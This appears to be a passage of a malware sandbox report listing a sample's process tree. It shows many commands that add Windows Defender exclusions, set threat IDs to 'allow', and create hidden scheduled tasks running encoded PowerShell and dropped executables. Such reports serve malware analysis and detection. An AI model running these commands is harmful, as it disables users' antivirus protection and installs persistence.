- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gGXvLIXyo" /SC once /ST 00:12:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4204
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gGXvLIXyo"
  2⤵
  PID:5908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gGXvLIXyo"
  2⤵
  PID:220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 00:20:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xSZzGJO.exe\" MC /jPWqdidkw 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2248
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:2548
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 560
  2⤵
  - Program crash
  PID:4204

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5084

C:\Users\Admin\AppData\Local\Temp\7zSD1E1.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSD1E1.tmp\Install.exe tg /TvzdidUmNn 385132 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5672
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3284
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4220
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6136
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gGideZWOf" /SC once /ST 00:41:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5796
